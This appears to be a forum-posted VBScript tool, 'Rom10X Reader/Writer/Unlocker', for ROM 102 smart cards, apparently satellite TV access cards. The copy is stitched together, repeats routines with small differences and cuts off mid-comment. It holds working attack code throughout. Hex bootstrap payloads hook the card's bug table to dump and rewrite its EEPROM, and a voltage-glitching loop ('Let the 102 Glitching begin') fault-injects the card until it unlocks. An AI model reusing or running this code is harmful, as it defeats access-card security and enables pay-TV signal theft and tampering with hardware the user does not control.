

If Address = 12608 Then 'This makes sure we don't overwrite our bug hook
BugOrig = mid(Tmpstr, 113, 12)
Tmp1 = mid(TmpStr, 1, 112)
Tmp2 = mid(TmpStr, 125, 4)
TmpStr = tmp1 & "050060DB9600" & tmp2
End If

If Address = 38400 Then 'This makes sure we don't overwrite our Bootstrap patch
Tmp2 = mid(TmpStr, 29, 100)
TmpStr = "A1FF270187CD5A7D0DFA8080BC80" & Tmp2
End If

BootWrite = "210054A0FFA64BB76B18647180CD7C16" & HexString(Address, 4) & "9240CC7A95" & TmpStr 'Writing EEPROM to card
CC = DoCheckSum(BootWrite)
BootWrite = BootWrite & CC
Sc.Write("60156057" & BootWrite & "0E10500500")
Sc.Delay(WriteDelay)
Sc.Read(2)
Bytes = Sc.Getbyte(1)
Sc.Read(bytes)

If Bytes <> 6 Then
Sc.MsgBox("Write Failed at Address: " & hexstring(Address, 4))
Exit Sub
End If

Call Sc.ProgressBox("Address: " & Hexstring(Address, 4) & " " & TmpStr, PBCounter, 288, "Writing to Card...")


TmpStr = ""
Address = Address + 64
PBcounter = PBCounter + 1
If Address = 14336 Then Address = 32768

End If

TmpStr = TmpStr & HexString(Fs.FileGetc(InFile), 2)

Next

BootWrite = "21001AA0FFA64BB76B18647180CD7C1631789206CC7A95" & BugOrig 'Removes Bug hook, and puts original back
CC = DoCheckSum(BootWrite)
BootWrite = BootWrite & CC
Sc.Write("2415601D" & BootWrite & "500500")
Sc.Delay(100)
Sc.Read(2)
Bytes = Sc.GetByte(1)

'This CMD04 will remove the Bootstrap patch located at $9600
BootWrite = ("21006DA0CA000067046501018600AA9D9D9D9D9D9D9D9DA64B B76B18647180CD7C169600A00EAE69CC7A9B00000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 000000000000000000000002")
CC = Dochecksum(BootWrite)
BootWrite = BootWrite & CC

Sc.Write("76156070" & BootWrite & "500700")
Sc.Delay(50)
Sc.Read(2)
Bytes = Sc.Getbyte(1)
Sc.Read(bytes)
If bytes <> 8 Then
sc.print bytes & vbcr
Sc.MsgBox ("Temporary write patch could not be removed.")
End If

Checkbugs = "21 00 07 A0 FF 00 00 02 48 00"
CC = Dochecksum(CheckBugs)
CheckBugs = CheckBugs & CC
Sc.Write("12 0E 05 15 AA" & checkbugs & "50 05 00")
Sc.Delay(50)
Sc.Read(2)
Bytes = Sc.Getbyte(1)
Sc.Read(bytes)
If Bytes > 4 then
byte1 = Sc.GetByte(0)
byte2 = Sc.GetByte(3)
End If

If byte1 = &h12 and byte2 = &h69 then
Else
Sc.MsgBox ("Temporary write patch could not be removed. Blocker Code is applied to your card.")
End if

Call Sc.ProgressBox("", 0, 256)

If Bytes = 6 Then
Sc.MsgBox("Writing Operation Complete!")
Else
Sc.MsgBox("Could not successfully unhook bug table. Please use unlock function to get back into card.")
End If

Fs.FileClose(Infile)
End Sub

Function GetPacketLen(ByVal Packet)

Dim Length
Dim Temp
Dim PK
Dim i

PK = ""

Length = Len(Packet)

For i = 1 To Length
Temp = Mid(Packet, i, 1)
If Temp <> " " Then 'remove all spaces in packet
PK = PK + Temp
End If
Next

GetPacketLen = Len(PK) 'return packet length without spaces

End Function

Sub GetEEPROMFileName()
EEPROMFileName = Fs.FileSaveDialog(FileFilter, "Please select a filename for the saved EEPROM file", "Rom102_Eeprom.bn102")
If EEPROMFileName <> "" Then
OutFileHndl = Fs.FileCreate(EEPROMFileName)
End If
End Sub

Function CheckCard()

Dim Bytes
Dim RomVer
Dim RevVer

CheckCard = 1

Sc.Write("06 10 01 03 50 1A 00")
Sc.Delay(80)
Sc.Read(2)

Bytes = Sc.Getbyte(1)

If Bytes <> &H1B Then
Sc.MsgBox("Invalid or no ATR present.")
CheckCard = 0
Exit Function
Else
Sc.Read(Bytes)
End If

T1 = chr(sc.getbyte(16))
T2 = chr(sc.getbyte(17))
T3 = chr(sc.getbyte(18))
T4 = chr(sc.getbyte(23))
T5 = chr(sc.getbyte(24))
T6 = chr(sc.getbyte(25))
T1 = T1 + T2 + T3
T4 = T4 + T5 + T6

If asc(T4) = 0 Then
T4 = "000"
End If

If T1 <> 102 Then
Sc.MsgBox("This Script only supports ROM 102 cards. Your card does not appear to be a ROM 102.")
CheckCard = 0
Exit Function
End If

If T4 = 109 or T4 = 245 or T4 = 285 Then
Sc.MsgBox("This Script does not support REV: " & T4 & "!")
CheckCard = 0
Exit Function
End If

End Function

Function DoCheckSum(ByVal Packet)

Dim Temp
Dim Length
Dim PK
Dim CheckSum
Dim i

PK = ""

Length = Len(Packet) 'get packet length with spaces

For i = 1 To Length
Temp = Mid(Packet, i, 1)

If Temp <> " " Then 'remove all spaces in packet
PK = PK + Temp
End If

Next

Length = Len(PK) 'get packet length without spaces

CheckSum = 0

For i = 0 To Length
i = i + 1 'Simulate Step 2 in VB scripting
Temp = Mid(PK, i, 2)
CheckSum = CheckSum Xor Hex2Dec(Temp) 'Calc Checksum
Next

DoCheckSum = HexString(CheckSum, 2) 'convert checksum to a hex strimg and return it to caller

End Function

Function HexString(ByVal Number, ByVal Length)

' This function takes 2 arguments, a number and a length. It converts the decimal
' number given by the first argument to a Hexidecimal string with its length
' equal to the number of digits given by the second argument
Dim RetVal
Dim CurLen

RetVal = Hex(Number)
CurLen = Len(RetVal)

If CurLen < Length Then
RetVal=String(Length-CurLen,"0") & RetVal
End If

HexString = RetVal

End Function

Function CheckChipVer()

CheckChipVer = 1

sc.write("90")
delay(80)

If sc.read(4) <> 4 Then
CheckChipVer = 0
Exit Function
End If

If getbyte(0) <> &H4E Then CheckChipVer = 0
If getbyte(1) <> &H44 Then CheckChipVer = 0
If getbyte(2) <> &H31 Then CheckChipVer = 0
If getbyte(3) <> &H33 Then CheckChipVer = 0

End Function

Public Function Hex2Dec(ByVal HexNumber)

' This function takes 1 argument, a string containing a hex value of any digit length
' and returns the decimal equivalent

Dim DecimalValue
Dim DigitCount
Dim Digit
Dim HexDigit

HexNumber = Replace(UCase(HexNumber), " ", "")
DigitCount = Len(HexNumber)

For Digit = 1 To DigitCount

HexDigit = Mid(HexNumber, Digit, 1)
If Asc(HexDigit) < 58 Then
DecimalValue = HexDigit * 16 ^ (DigitCount - Digit)
Else
DecimalValue = (Asc(HexDigit) - 55) * 16 ^ (DigitCount - Digit)
End If
Hex2Dec = Hex2Dec + DecimalValue
Next

End Function

Function setupunlocker()

Wx.BaudRate = 115200
Wx.ResetBaudRate = 115200
Wx.Parity = 0 ' 0 = None, 1 = Odd, 2 = Even, 3 = Mark, 4 = Space
Wx.StopBits = 0 ' 0 = 1 stop bit, 1 = 1.5 stop bits, 2 = 2 stop bits
Wx.DTRControl = 0 ' Initial state of DTR 0 = off, 1 = on
Wx.RTSControl = 1 ' Initial state of RTS 0 = off, 1 = on
Wx.ResetDelay = 100 ' In microseconds
Wx.ByteDelay = 10 ' In microseconds
Wx.RxByteTimeout = 500 ' In milliseconds
Wx.ResetMode = 2 ' 0 = No Resets, 1 = ISO Reset (Expect a ATR), 2 = Device Reset (No ATR)
Wx.ResetLine = 1 ' 0 = Toggle RTS for Reset, 1 = Toggle DTR for Reset
Wx.ByteConvention = 1 ' 0 = Inverse, 1 = Direct
Wx.FlushEchoByte = 0 ' 0 = no flush, 1 = flush - A Phoenix interface will echo each byte transmitted.
Wx.FlushBeforeWrite = 1 ' 0 = no flush, 1 = flush - Flush the receive buffer before each write to strip off Null bytes.
Wx.IgnoreTimeouts = 1 ' 0 = Abort script on a receive timeout, 1 = Ignore all receive timeouts
Wx.ResetAfterTimeout = 0 ' 0 = Don't reset after a timeout, 1 = do a reset after a timeout - Not used if "IgnoreTimeouts=0"
Wx.LogTransactions = 0 ' 0 = Don't log transactions, 1 = log transactions
Wx.DisplayUSW = 0 ' Display USW after script complete 0 = no, 1 = yes
Wx.DisplayFuse = 0 ' Display Fuse after script complete 0 = no, 1 = yes

End Function


REV 108

'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
'X Rom10X Reader/Writer/Unlocker X
'X For ROM 102 Cards REV 244, 108
'X X
'X XXXXX XX XXXX X
'X XX XX XXX XX XX XXX XX XX XX XX X
'X XX XX XX XX XXX XXX XX XX XX XX XX X
'X XX XX XX XX XX X XX XX XX XX XXX X
'X XXXX XX XX XX XX XX XX XX XXX X
'X XX XX XX XX XX XX XX XX XX XX XX X
'X XX XX XXX XX XX XX XX XX XX XX X
'X XX XX XXXX XXXX X
'X =========================================== X
'X Please Note: Attempt to read your card a few times to make sure that your loader is set up X
'X properly before you attempt to write to your card. USE AT YOUR OWN RISK! X
'X You may loop your CAM!!!!! X
'X Various code snippets used from other scripts posted. Kudos to the Authors.. you know who you X
'X are. X
'X X
'X ROM10X Coder Team X
'X www.rom10x.com X
'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX


Const fsoSEEK_SET = 0
Const fsoSEEK_CUR = 1
Const fsoSEEK_END = 2
Const ofOverwritePrompt = &H2 ' Generates a warning message if the user tries to select a file name that is already in use,
Const ofHideReadOnly = &H4 ' Removes the Open As Read Only check box from the dialog.
Const ofPathMustExist = &H800 ' Generates an error message if the user tries to select a file name with a nonexistent directory path.
Const ofFileMustExist = &H1000 ' Generates an error message if the user tries to select a nonexistent file. (only applies to Open dialogs).
Const ofShareAware = &H4000 ' Ignores sharing errors and allows files to be selected even when sharing violations occur.
Const ofEnableSizing = &H800000 ' (Windows 98 and later) Lets the Explorer-style dialog be resized with the mouse or keyboard.
Dim T1
Dim T2
Dim T3
Dim T4
Dim T5
Dim T6
Dim EEPROMFileName
Dim OutFileHndl, FileName, FileHandle
Dim WriteDelay


'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
WriteDelay = 10 'This can be edited to increase delays for slower loaders. Default = 10 X
'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Sub Main()

Sc.Verbose = false 'set to true to view RX/TX from card

Dim Bytes
Dim Byte1
Dim Byte2
Dim Byte3
Dim Ulock
Dim CS
Dim SFlag
Dim RomVer
Dim RetVal

ClearOutputWindow()

Call SetupUnlocker()

If CheckChipVer = 1 Then
Else
Sc.MsgBox("This script requires ND13 atmel code. Please flash your loader with ND13.")
Exit Sub
End If

If CheckCard = 1 Then
Else
Exit Sub
End If

Sc.Write("02 15 00")
Sc.Read(2)

Do
RetVal = Sc.ButtonBox("Please choose function to perform:" & vbcrlf & vbcrlf, vbDefaultButton3 + vbCritical, "Rom10X 102 Read/Write/Unlock Utility", "Read Card", "Write Card", "Unlock Card", "Exit")

If RetVal = 0 Or RetVal = 4 Then
Sc.Print ("User Aborted!") & VbCr
Exit Do
End If

If RetVal = 1 Then
Call ReadCard()
End If

If RetVal = 2 Then
Call WriteCard()
End If

If RetVal = 3 Then
Call MethodThree()
End If
Loop
End Sub

Sub MethodThree

Dim BSCLen
Dim CmdToGlitch
Dim CmdTosetup
Dim CTGLen
Dim CTGLen2
Dim CTGRSP
Dim CS
Dim Bytes
Dim BytesRead
Dim Bytes1
Dim Bytes2
Dim DelayStart
Dim DelayLimit
Dim VCCStart
Dim VCCLimit
Dim GlitchType
Dim GlitchMax
Dim GlitchMin
Dim Delay
Dim VCC
Dim Dot
Dim ATRrsp
Dim loopctr
Dim AddrHiStart
Dim AddrHiEnd
Dim cRet
Dim RomAddr
Dim PageSet
Dim trys
Dim mix
Dim AVRDelay
Dim AVRCount

clearoutputwindow()

loopctr = 0
AVRCount = 0

If CheckChipVer <> 1 Then
Sc.MsgBox("You need chip version ND13 to run this script" & VbCr & "Flash your Atmel chip with NewD13.hex")
Exit Sub
End If

Sc.Verbose = false 'Turn echo on - False = turns it off
VCCStart = &H15 'h25 is standard, script is auto vcc dont change 90
VCCLimit = &H00 'h05 is standard, script is auto vcc dont change 02

'================================================= =========================
'================================================= =========================
'User selectable options
'================================================= =========================
'================================================= =========================

DelayStart = &H3800 'Change this to whatever you want
DelayLimit = &H3A50 'This is the limit. it will go back to DelayStart when it reaches here.
GlitchMax = 7 '7 is standard - 7, 8, or 9
GlitchMin = 7 '7 is standard - 6, or 7
trys = 40 '100 is standard
mix = 0.5 '0.5 is standard - try 0.1 to 1.2 use for +-+-+-+- mix
AVRDelay = 3 'Minimum = 3 Delay for atmel to wait for a response
'************************************************* **************************
'************************************************* **************************
'******* This Section is FOR ADVANCE USERS ONLY ********
'************************************************* **************************
'************************************************* **************************

GlitchType = GlitchMax
Delay = DelayStart
VCC = VCCStart
Sc.Print("Let the 102 Glitching begin...." & VbCr)
Dot = 0
Do
Do
Sc.Write("A2")
Sc.Write("B0" & HexString(VCC, 2))

Sc.Write("06 10 01 03 50 1A 00")
Sc.Read(2)

ATRrsp = Sc.Getbyte(1)

Sc.Read(ATRrsp)
If ATRrsp = &H1B Then
Exit Do
Else
Sc.Write("B0" & HexString(VCC, 2))
sc.delay(30)
Sc.Write("08 10 01 01 01 03 50 1A 00")
Sc.Read(2)
ATRrsp = Sc.Getbyte(1)
If ATRrsp = &H1B Then
Sc.Read(ATRrsp)
Exit Do
Else
print(VbCr & "NO 2nd ATR Rcv'd, continue reset, back to first atr" & VbCr)
sc.delay(100)
Sc.Write("04 01 01 01 00")
End If
End If
Loop

Sc.Write("02 15 00")
Sc.Read(2)

Sc.Write("0A 60 04 21 C1 01 80 61 50 04 00")
Sc.Read(2)
cRet = Sc.Getbyte(1)
Sc.Read(cRet)

Sc.Write("0B 60 05 21 C1 02 5A 44 FC 50 03 00")
Sc.Read(2)
cRet = Sc.Getbyte(1)
Sc.Read(cRet)

Sc.Write ("73 0A 70 8D 00 A7 00 00 00 00 00 00 00 00 00 00 00 00 71 80 18 64 A6 4B B7 6B CD 7C 16 30 C0 A4 02 18 64 CD 7C 16 95 C0 A6 07 18 64 CD 7C 16 31 76 AD 08 20 18 95 BF BF A1 FF 27 01 87 BC 88 01 1E 05 00 60 DB 95 C0 DE CA FE C0 FF EE CD 5A C0 00 B5 0D F8 06 A6 06 B7 64 B7 4C CD 45 05 20 FE 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00")
Sc.Read(2)
Sc.Write ("47 0E" & hexstring(AVRDelay, 2) & "0B 60 3A 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 AE BC 20" & HexString(Delay, 4) & HexString(GlitchType, 2) & "50 05 00")
Sc.Read(2)
Bytes = Sc.Getbyte(1)
sc.verbose = true
Sc.Read(Bytes)
sc.verbose = false
If Bytes > 3 then
AVRCount = 0
Bytes1 = Sc.Getbyte(0)
Bytes2 = Sc.Getbyte(3)

If Bytes1 = &hDE And Bytes2 = &HC0 Then
Sc.Write("A1")
Sc.Print(VbCr)
Sc.Print("===========================================" & VbCr)
Sc.Print("Glitch Success!! DE CA FE C0 FF EE" & VbCr)
Sc.Print("Card is Unlocked!!!" & VbCr)
Sc.Print("VCC = " & HexString(VCC, 2) & " (~" & ((5 / 255) * VCC) & " vdc)" & VbCr)
Sc.Print("Glitch Delay = " & HexString(Delay, 4) & VbCr)
Sc.Print("Glitch type " & HexString(GlitchType, 2) & VbCr)
Sc.Print("===========================================" & VbCr)
Exit Sub
Else
If Bytes2 = &H6F Then
sc.print("-")
Else
If Bytes2 = &HFF Then
Sc.Print("+")
Else
sc.print "NoRsp+"
End If
End If
End If

If Bytes1 = &H12 Then
Vcc = Vcc + 0.25
End If
Else
AVRCount = AVRCount + 1
If AVRCount => 5 then
AVRDelay = AVRDelay + 1
Sc.print "Increasing AVR delay to " & hexstring(AVRdelay ,2) & vbcr
AVRCount = 0
End If
End If

VCC = VCC - mix
print("-")
GlitchType = GlitchType - 1
If VCC < VCCLimit Then
VCC = VCCStart
End If
If GlitchType < GlitchMin Then
GlitchType = Glitchmax
End if
loopctr = loopctr + 1
If loopctr > trys Then
clearoutputwindow()
loopctr = 0
Delay = Delay + 1
If Delay > DelayLimit Then
Delay = DelayStart
End If
'end if
Sc.Print("Let the 102 Glitching continue...." & VbCr)
Sc.print("AVR delay = " & hexstring(AVRdelay ,2) & VbCr)
Sc.Print("Glitch Delay = " & HexString(Delay, 4) & VbCr)
Sc.Print("VCC = " & HexString(VCC, 2) & VbCr)
Sc.Print(" " & VbCr)
End If
Loop
End Sub

Sub ReadCard()

Dim Bytes
Dim BootStrap
Dim CS
Dim Counter
Dim PBCounter
Dim Address

Address = 12288
PBCounter = 1

Sc.Write("06100103501A00") '-Get ATR
Sc.Delay(80)
Sc.Read(2)
Bytes = Sc.GetByte(1)
Sc.Read(Bytes)
Sc.Write("021500")
Sc.Read(2)
Sc.Write("0A600421C101A041500400") '-Set IFS
Sc.Delay(50)
Sc.Read(2)
Bytes = Sc.Getbyte(1)
Sc.Read(Bytes)

GetEEPROMFileName()

Do
'Get 64 bytes from Card using "Address" as pointer
BootStrap = "21006DA0CA000067046501018600AA9D9D9D9D9D9D9D9D7180 CD5AC0" & HexString(Address, 4) & "0DF840B691B74CCD4505CC7A959D9D9D9D9D9D9D9D9D9D9D9D 9D9D9D9D9D9D9D9D9D9D9D9D9D9D9D9D9D9D9D9D9D9D9D9D9D 9D9D9D9D9D9D9D9D9D9D9D9D9D9D9D9D9D9D9D9D9D9D9D9D9D 9D9D9D9D9D9D02"

CS = DoCheckSum(BootStrap) 'Get Checksum of BootStrap string
BootStrap = BootStrap & CS
Sc.Write("77150E036070" & BootStrap & "8700")
Sc.Read(2)
bytes = Sc.GetByte(1)
Sc.Read(bytes)

Sc.Write("1215AA210007A0FF0000024800330E03504000") 'Execute BootStrap String with A0FF intercept
Sc.Read(2)
Bytes = Sc.GetByte(1)
Sc.Read(bytes)

If Bytes = 0 Then 'Check condition of Atmel after read request
Print(VbCr & "--- Eeprom Read Failed, A0FF intercept is not installed, Or card locked. ---")
Call Sc.MsgBox("--- Eeprom Read Failed, A0FF intercept is not installed ---")
Exit Sub
End If

If Bytes = 65 Then
Counter = Counter + 1

For i = 0 To 63
Call Fs.FilePutc(OutFileHndl, Sc.GetByte(i))
Next

Call Sc.ProgressBox("Address: " & Hexstring(Address, 4), PBCounter, 288, "Saving Eeprom information...")

Address = Address + 64 'increment address pointer by &h40 bytes

If Address = 14336 Then 'If address gets to $3800 then change it to $8000
Address = 32768
End If

PBCounter = PBCounter + 1 'Increment the progressbar

If Address = 49152 Then Exit Do 'If we're at the end, then exit
End If
Loop
Call Sc.ProgressBox("", 0, 256) 'close the progressbar

Fs.FileClose(OutFileHndl) 'close the file
Sc.MsgBox("Reading Complete!")
End Sub

Sub WriteCard()

Dim CheckBugs
Dim BugOrig
Dim InFile
Dim FileName
Dim FileSize
Dim ThisByte
Dim TmpStr
Dim Outfile
Dim CC
Dim Address
Dim Bytes
Dim PBCounter
Dim Tmp1
Dim Tmp2

Address = 12416
PBCounter = 1
'---------------------------------------------------------------------------------------------
Const FileFilter = "All Eprom Files (*.bn102, *.bin)|*.bn102;*.bin;|Bin Files (*.bn102)|*.bn102|Bin Files (*.bin)|*.bin"

FileName = Fs.FileOpenDialog(FileFilter, "Please select a valid bin file", "Default.bn102", ofPathMustExist + ofFileMustExist + ofHideReadOnly + ofEnableSizing)
If FileName <> "" Then
If Fs.FileExists(FileName) = 0 Then
Sc.MsgBox("The file does not exist")
Else
InFile = Fs.FileOpen(FileName, fsoOpenRead)
End If
End If

FileSize = Fs.FileSeek(InFile, 0, fsoSEEK_END)

If FileSize <> 18432 Then
Sc.MsgBox("This file does not appear to be a valid ROM 102 EEPROM file")
Exit Sub
End If

If CheckChipVer = 1 Then
Else
Sc.MsgBox("This script requires ND13 atmel code. Please flash your loader with ND13.")
Exit Sub
End If

If CheckCard = 1 Then
Else
Exit Sub
End If

Sc.Write("02 15 00") 'set baud
Sc.Read(2)

Sc.Write("0A600421C101A041500400") '-set IFS
Sc.Delay(50)
Sc.Read(2)
Bytes = Sc.Getbyte(1)
Sc.Read(bytes)

'This CMD 04 Gets the original value of the first bugtable entry.
'We are going to hook here, so we need to know what was originally there, so we can replace
'after we're finished writing.
CheckBugs = ("21 00 6D A0 CA 00 00 67 04 65 01 01 86 00 AA 9D 9D 9D 9D 9D 9D 9D 9D 71 80 CD 5A C0 31 78 0D F8 06 B6 91 B7 4C CD 45 05 CC 7A 95 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 9D 02")
CC = Dochecksum(CheckBugs) 'calculates the checksum byte
CheckBugs = CheckBugs & CC 'adds the checksum byte at the end of our string

Sc.Write("77150E036070" & CheckBugs & "8700") 'sends our string
Sc.Delay(50)
Sc.Read(2)
Bytes = Sc.Getbyte(1)
Sc.Read(bytes)
If bytes <> 8 Then
checklock = 0
Exit Sub
End If
Checkbugs = "21 00 07 A0 FF 00 00 02 48 00"
CC = Dochecksum(CheckBugs)
CheckBugs = CheckBugs & CC

Sc.Write("12 15 AA" & checkbugs & "0E 03 50 0B 00") 'executes our string with the A0FF intercept
Sc.Delay(50)
Sc.Read(2)
Bytes = Sc.Getbyte(1)
Sc.Read(bytes)

If Bytes = &HC Then
T1 = Sc.Getbyte(0)
T2 = Sc.Getbyte(1)
T3 = Sc.Getbyte(2)
T4 = Sc.Getbyte(3)
T5 = Sc.Getbyte(4)
T6 = Sc.Getbyte(5)
'This variable stores the original Bugtable code, which will be replaced when we're finished writing
'BugOrig = hexstring(T1, 2) & hexstring(T2, 2) & hexstring(T3, 2) & hexstring(T4, 2) & hexstring(T5, 2) & Hexstring(T6, 2)
Else
Sc.Msgbox("The Card appears to be locked")
Exit Sub
End If

'This CMD 04 will write our Bootstrap patch located at $9600
BootWrite = "21006DA0CA000067046501018600AA9D9D9D9D9D9D9D9DA64B B76B18647180CD7C169600A010CC7A95000000000000A1FF27 0187CD5A7D0DFA8080BC800000000000000000000000000000 00000000000000000000000000000000000000000000000000 000000000000000000000002"


CC = DoCheckSum(BootWrite)
BootWrite = BootWrite & CC

Sc.Write("77150E036070" & BootWrite & "8700")
Sc.Delay(50)
Sc.Read(2)
Bytes = Sc.Getbyte(1)
Sc.Read(bytes)

If bytes <> 8 Then
Sc.MsgBox("Write Failed")
Exit Sub
End If
Checkbugs = "21 00 07 A0 FF 00 00 02 48 00"
CC = Dochecksum(CheckBugs)
CheckBugs = CheckBugs & CC

Sc.Write("12 15 AA" & checkbugs & "0E 03 50 05 00")
Sc.Delay(50)
Sc.Read(2)
Bytes = Sc.Getbyte(1)
Sc.Read(bytes)
'This CMD 04 will hook our Bugtable at $3178 = "050060DB9600" (This will later be replaced with original value)
BootWrite = ("21006DA0CA000067046501018600AA9D9D9D9D9D9D9D9DA64B B76B18647180CD7C163178A006CC7A95000000000000050060 DB960000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 000000000000000000000002")
CC = Dochecksum(BootWrite)
BootWrite = BootWrite & CC

Sc.Write("756070" & BootWrite & "500700")
Sc.Delay(50)
Sc.Read(2)
Bytes = Sc.Getbyte(1)
Sc.Read(bytes)
If bytes <> 8 Then
checklock = 0
Exit Sub
End If
Checkbugs = "21 00 07 A0 FF 00 00 02 48 00"
CC = Dochecksum(CheckBugs)
CheckBugs = CheckBugs & CC

Sc.Write("12 15 AA" & checkbugs & "0E 03 50 05 00")
Sc.Delay(50)
Sc.Read(2)
Bytes = Sc.Getbyte(1)
Sc.Read(bytes)

Byte1 = Sc.Getbyte(0)
Byte2 = Sc.getbyte(3)

If Byte1 = &H12 And Byte2 = &H90 Then
Else
sc.msgbox("Write Failed!")
Exit Sub
End If

'-------------------------------------------------------------------------
Call Fs.FileSeek(InFile, FileSize - (FileSize - &H80), fsoSEEK_SET)

TmpStr = ""
For ThisByte = 0 To 18304
If ThisByte > 0 And ThisByte Mod 64 = 0 Then


If Address = 12608 Then 'This makes sure we don't overwrite our bug hook
BugOrig = mid(Tmpstr, 113, 12)
Tmp1 = mid(TmpStr, 1, 112)
Tmp2 = mid(TmpStr, 125, 4)
TmpStr = tmp1 & "050060DB9600" & tmp2
End If

If Address = 38400 Then 'This makes sure we don't overwrite our Bootstrap patch
Tmp2 = mid(TmpStr, 29, 100)
TmpStr = "A1FF270187CD5A7D0DFA8080BC80" & Tmp2
End If

BootWrite = "210054A0FFA64BB76B18647180CD7C16" & HexString(Address, 4) & "9240CC7A95" & TmpStr 'Writing EEPROM to card
CC = DoCheckSum(BootWrite)
BootWrite = BootWrite & CC
Sc.Write("60156057" & BootWrite & "0E10500500")
Sc.Delay(WriteDelay)
Sc.Read(2)
Bytes = Sc.Getbyte(1)
Sc.Read(bytes)

If Bytes <> 6 Then
Sc.MsgBox("Write Failed at Address: " & hexstring(Address, 4))
Exit Sub
End If

Call Sc.ProgressBox("Address: " & Hexstring(Address, 4) & " " & TmpStr, PBCounter, 288, "Writing to Card...")


TmpStr = ""
Address = Address + 64
PBcounter = PBCounter + 1
If Address = 14336 Then Address = 32768

End If

TmpStr = TmpStr & HexString(Fs.FileGetc(InFile), 2)

Next

BootWrite = "21001AA0FFA64BB76B18647180CD7C1631789206CC7A95" & BugOrig 'Removes Bug hook, and puts original back
CC = DoCheckSum(BootWrite)
BootWrite = BootWrite & CC
Sc.Write("2415601D" & BootWrite & "500500")
Sc.Delay(100)
Sc.Read(2)
Bytes = Sc.GetByte(1)

'This CMD04 will remove the Bootstrap patch located at $9600
BootWrite = ("21006DA0CA000067046501018600AA9D9D9D9D9D9D9D9DA64B B76B18647180CD7C169600A00EAE69CC7A9B00000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 000000000000000000000002")
CC = Dochecksum(BootWrite)
BootWrite = BootWrite & CC

Sc.Write("76156070" & BootWrite & "500700")
Sc.Delay(50)
Sc.Read(2)
Bytes = Sc.Getbyte(1)
Sc.Read(bytes)
If bytes <> 8 Then
sc.print bytes & vbcr
Sc.MsgBox ("Temporary write patch could not be removed.")
End If

Checkbugs = "21 00 07 A0 FF 00 00 02 48 00"
CC = Dochecksum(CheckBugs)
CheckBugs = CheckBugs & CC
Sc.Write("12 0E 05 15 AA" & checkbugs & "50 05 00")
Sc.Delay(50)
Sc.Read(2)
Bytes = Sc.Getbyte(1)
Sc.Read(bytes)
If Bytes > 4 then
byte1 = Sc.GetByte(0)
byte2 = Sc.GetByte(3)
End If

If byte1 = &h12 and byte2 = &h69 then
Else
Sc.MsgBox ("Temporary write patch could not be removed. Blocker Code is applied to your card.")
End if

Call Sc.ProgressBox("", 0, 256)

If Bytes = 6 Then
Sc.MsgBox("Writing Operation Complete!")
Else
Sc.MsgBox("Could not successfully unhook bug table. Please use unlock function to get back into card.")
End If

Fs.FileClose(Infile)
End Sub

Function GetPacketLen(ByVal Packet)

Dim Length
Dim Temp
Dim PK
Dim i

PK = ""

Length = Len(Packet)

For i = 1 To Length
Temp = Mid(Packet, i, 1)
If Temp <> " " Then 'remove all spaces in packet
PK = PK + Temp
End If
Next

GetPacketLen = Len(PK) 'return packet length without spaces

End Function

Sub GetEEPROMFileName()
EEPROMFileName = Fs.FileSaveDialog(FileFilter, "Please select a filename for the saved EEPROM file", "Rom102_Eeprom.bn102")
If EEPROMFileName <> "" Then
OutFileHndl = Fs.FileCreate(EEPROMFileName)
End If
End Sub

Function CheckCard()

Dim Bytes
Dim RomVer
Dim RevVer

CheckCard = 1

Sc.Write("06 10 01 03 50 1A 00")
Sc.Delay(80)
Sc.Read(2)

Bytes = Sc.Getbyte(1)

If Bytes <> &H1B Then
Sc.MsgBox("Invalid or no ATR present.")
CheckCard = 0
Exit Function
Else
Sc.Read(Bytes)
End If

T1 = chr(sc.getbyte(16))
T2 = chr(sc.getbyte(17))
T3 = chr(sc.getbyte(18))
T4 = chr(sc.getbyte(23))
T5 = chr(sc.getbyte(24))
T6 = chr(sc.getbyte(25))
T1 = T1 + T2 + T3
T4 = T4 + T5 + T6

If asc(T4) = 0 Then
T4 = "000"
End If

If T1 <> 102 Then
Sc.MsgBox("This Script only supports ROM 102 cards. Your card does not appear to be a ROM 102.")
CheckCard = 0
Exit Function
End If

If T4 = 109 or T4 = 245 or T4 = 286 Then
Sc.MsgBox("This Script does not support REV: " & T4 & "!")
CheckCard = 0
Exit Function
End If

End Function

Function DoCheckSum(ByVal Packet)

Dim Temp
Dim Length
Dim PK
Dim CheckSum
Dim i

PK = ""

Length = Len(Packet) 'get packet length with spaces

For i = 1 To Length
Temp = Mid(Packet, i, 1)

If Temp <> " " Then 'remove all spaces in packet
PK = PK + Temp
End If

Next

Length = Len(PK) 'get packet length without spaces

CheckSum = 0

For i = 0 To Length
i = i + 1 'Simulate Step 2 in VB scripting
Temp = Mid(PK, i, 2)
CheckSum = CheckSum Xor Hex2Dec(Temp) 'Calc Checksum
Next

DoCheckSum = HexString(CheckSum, 2) 'convert checksum to a hex strimg and return it to caller

End Function

Function HexString(ByVal Number, ByVal Length)

' This function takes 2 arguments, a number and a length. It converts the decimal
' number given by the first argument to a Hexidecimal string with its length
